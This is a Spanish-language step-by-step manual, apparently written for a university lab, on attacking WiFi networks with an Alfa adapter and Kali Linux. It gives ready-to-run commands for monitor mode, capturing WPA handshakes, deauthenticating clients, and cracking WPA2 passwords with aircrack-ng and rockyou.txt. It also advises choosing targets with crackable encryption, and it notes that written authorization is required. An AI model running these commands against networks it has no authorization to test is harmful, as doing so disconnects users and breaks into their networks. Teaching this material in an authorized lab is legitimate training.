=============================================
MANUAL PENTESTING WiFi - ALPHA AWUS036ACH
=============================================
Chipset: RTL8812AU | Dual-band 2.4/5GHz
Para laboratorio universitario con Live Boot USB Kali Linux

CONTENIDO:
  PARTE 1:  Instalar driver en Windows
  PARTE 2:  Crear USB bootable de Kali Linux
  PARTE 3:  Arrancar Kali desde USB
  PARTE 4:  Activar modo monitor
  PARTE 5:  Escanear redes WiFi
  PARTE 6:  Capturar handshake de una red
  PARTE 7:  Ataque de deauth (forzar handshake)
  PARTE 8:  Crackear la contraseña
  PARTE 9:  Persistencia del USB
  PARTE 10: Resumen de comandos rapidos
  PARTE 11: Tips laboratorio universitario


=============================================
PARTE 1: INSTALAR DRIVER EN WINDOWS
=============================================

Paso 1: Descargar driver
  Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/
  Descarga el driver Windows (RTL8812AU).

Paso 2: Instalar
  1. Desconecta la antena
  2. Ejecuta el instalador como administrador
  3. Reinicia el PC
  4. Conecta la antena despues de reiniciar

Paso 3: Verificar
  Abre PowerShell y ejecuta:
    Get-NetAdapter
  Deberias ver "Realtek 8812AU" con estado "Up".

  En Windows solo puedes escanear redes con Acrylic WiFi Free.
  Para pentesting REAL necesitas Kali Linux (Parte 2).


=============================================
PARTE 2: CREAR USB BOOTABLE DE KALI LINUX
=============================================

Paso 1: Descargar Kali
  Ve a https://www.kali.org/get-kali/
  Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)

Paso 2: Grabar ISO en USB con Rufus
  Necesitas: USB de 16GB minimo + Rufus

  1. Descarga Rufus desde https://rufus.ie/
  2. Inserta el USB
  3. Abre Rufus
  4. Device = tu USB
  5. Boot selection = selecciona el ISO de Kali
  6. Partition scheme = MBR
  7. Target system = BIOS o UEFI
  8. Persistent storage -> mueve la barra a 8-12 GB
     >>> ESTO ES LO QUE CREA LA PARTICION PERSISTENTE <<<
     Si no la mueves, TODO se pierde al apagar
  9. Haz clic en START
  10. Selecciona "Write in DD mode" cuando pregunte
  11. Espera a que termine (~10-15 min)


=============================================
PARTE 3: ARRANCAR KALI DESDE USB
=============================================

Paso 1: Configurar BIOS para arrancar desde USB
  1. Reinicia el PC
  2. Pulsa F2, F12 o DEL al encender (depende del PC)
  3. En BIOS ve a "Boot" o "Boot Order"
  4. Pon "USB-HDD" o "Removable Device" como primera opcion
  5. Guarda y sal (F10 normalmente)

Paso 2: Arrancar Kali
  1. En el menu de GRUB selecciona "Live system (amd64)"
  2. Usuario: kali / Contrasena: kali

Paso 3: Conectar la antena Alpha
  1. Conecta la Alpha por USB DESPUES de arrancar Kali
  2. Abre terminal y verifica:
       lsusb
     Debe aparecer: Realtek Semiconductor Corp. RTL8812AU

  3. Verifica la interfaz de red:
       iwconfig
     Debe aparecer: wlan0 o wlan1

  Si NO aparece wlan0, instala el driver:
    sudo apt update
    sudo apt install -y realtek-rtl88xxau-dkms
    sudo reboot


=============================================
PARTE 4: ACTIVAR MODO MONITOR
=============================================

El modo monitor permite escuchar TODO el tráfico WiFi
sin estar conectado a ninguna red. Es la base del pentesting.

  # 1. Matar procesos que interfieran
  sudo airmon-ng check kill

  # 2. Activar modo monitor
  sudo airmon-ng start wlan0

  # 3. Verificar que esta en modo monitor
  iwconfig wlan0mon
  # Debe decir: "Mode: Monitor"

Si en vez de wlan0mon aparece wlan0 en modo monitor,
usa wlan0 en todos los comandos siguientes.

SALIR del modo monitor cuando termines:
  sudo airmon-ng stop wlan0mon


=============================================
PARTE 5: ESCANEAR REDES WiFi
=============================================

Este es el paso mas importante. Aqui ves TODAS las redes
a tu alrededor.

  sudo airodump-ng wlan0mon

Veras una tabla con estas columnas:

  BSSID     = MAC del punto de acceso (router)
  PWR       = Potencia de señal (-30=excelente, -90=malo)
  Beacons   = Paquetes beacon recibidos
  #Data     = Paquetes de datos capturados
  CH        = Canal (1-13 en 2.4GHz, 36-165 en 5GHz)
  ENC       = Cifrado (WPA2, WPA3, OPN=abierto)
  ESSID     = Nombre de la red WiFi

PARA PARAR: pulsa Ctrl+C

CONSEJOS para elegir red objetivo:
  - PWR entre -30 y -60 = buena señal (lo ideal)
  - #Data alto = hay trafico (clientes activos)
  - ENC = WPA2 (es el mas comun, se puede crackear)
  - Evita OPN (abierto) y WPA3 (dificil)


=============================================
PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
=============================================

Una vez que has elegido tu red objetivo (por ejemplo
"CampusLab" en canal 6 con BSSID AA:BB:CC:DD:EE:FF),

abre UNA NUEVA terminal (no cierres la de escaneo)
y ejecuta:

  sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

REEMPLAZA:
  - "6" por el canal de tu red objetivo
  - "AA:BB:CC:DD:EE:FF" por el BSSID de tu red
  - "captura" es el nombre del archivo donde guardara datos

Este comando:
  1. Escucha SOLO esa red en su canal
  2. Guarda todo en archivos: captura-01.cap, captura-01.csv
  3. Espera a que aparezca un "WPA handshake"

El WPA handshake aparece arriba a la derecha:
  WPA handshake: AA:BB:CC:DD:EE:FF

ESTO ES LO QUE NECESITAS para crackear la contrasena.

Si no aparece el handshake, necesitas un cliente
conectandose. Sigue en la Parte 7 para forzarlo.


=============================================
PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
=============================================

Si el handshake no aparece solo, puedes FORZAR a un
cliente a reconectarse. Esto le desconecta momentaneamente
y al reconectarse se captura el handshake.

ABRE UNA TERCERA terminal y ejecuta:

  sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon

REEMPLAZA:
  - "5" = numero de paquetes de deauth (5-10 suele bastar)
  - "AA:BB:CC:DD:EE:FF" = BSSID del router (igual que antes)
  - "XX:XX:XX:XX:XX:XX" = MAC del cliente conectado

Para ver clientes conectados a tu red, mira la terminal
de la Parte 6. Bajo la columna "STATION" veras las MAC
de los clientes conectados.

Si no sabes la MAC del cliente, puedes omitir -c:
  sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Esto envia deauth a TODOS los clientes de esa red.

VERIFICA que aparezca "WPA handshake" en la terminal
de la Parte 6 despues del ataque.


=============================================
PARTE 8: CRACKEAR LA CONTRASEÑA
=============================================

Una vez tengas el WPA handshake capturado:

Paso 1: Descomprimir el diccionario
  sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Paso 2: Ejecutar aircrack-ng
  aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap

Sustituye "captura-01.cap" por el nombre de tu archivo.

Esto prueba TODAS las contrasenas del diccionario contra
el handshake capturado. Velocidad: ~1000-5000 claves/segundo.

Si la contrasena esta en el diccionario veras:
  KEY FOUND! [ la_contrasena ]

Si no esta en el diccionario:
  - Prueba con otro diccionario mas grande
  - O usa fuerza bruta (mucho mas lento):
    aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap


=============================================
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
=============================================

Si usas Kali Live, al reiniciar TODO se pierde
a menos que tengas persistencia.

Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2)
  Si activaste "Persistent storage" en Rufus, los archivos en
  /home/kali se guardan automaticamente entre reinicios.

Opcion B - Montar particion persistente manualmente:
  sudo mkdir -p /mnt/persistence
  sudo mount /dev/sdb3 /mnt/persistence
  cp captura-01.cap /mnt/persistence/
  echo "RED: CampusLab | PASS: la_contrasena" > /mnt/persistence/wifi_cracked.txt
  sudo umount /mnt/persistence

Opcion C - Segundo USB o red:
  cp captura-01.cap /media/kali/MI_USB/
  # O subir a un servidor:
  scp captura-01.cap user@ip_servidor:/ruta/


=============================================
PARTE 10: RESUMEN DE COMANDOS RAPIDOS
=============================================

Ver antena:           lsusb && iwconfig
Matar interferencias: sudo airmon-ng check kill
Activar monitor:      sudo airmon-ng start wlan0
Escanear redes:       sudo airodump-ng wlan0mon
Capturar 1 red:       sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
Deauth 1 cliente:     sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
Crackear:             aircrack-ng -w rockyou.txt file.cap
Salir monitor:        sudo airmon-ng stop wlan0mon


=============================================
PARTE 11: TIPS PARA EL LABORATORIO UNIVERSITARIO
=============================================

1. Empieza solo con escaneo pasivo (airodump-ng) - aprende
   a leer las redes antes de hacer nada activo.

2. Documenta que redes hay, en que canales, que cifrado usan.

3. Solo testea redes que tengas autorizacion explicita -
   pide al profesor/encargado por escrito.

4. Practica primero con tu propio router si puedes.

5. El rockyou.txt viene en Kali en /usr/share/wordlists/
   (descomprimir con sudo gunzip).

6. No hagas deauth en redes publicas reales - es ilegal
   sin autorizacion.

7. Si la senal es mala (PWR < -70), acercate al router
   o usa la antena con el reflector parabolico.


=============================================
LEER ESTE MANUAL DESDE KALI LIVE
=============================================

Si copiaste este archivo al USB de Kali, puedes leerlo
desde la terminal con:

  sudo mount /dev/sdb1 /mnt
  cat /mnt/MANUAL_PENTEST.txt

O para verlo pagina por pagina:
  cat /mnt/MANUAL_PENTEST.txt | less

Para copiarlo al escritorio de Kali:
  cp /mnt/MANUAL_PENTEST.txt ~/Desktop/
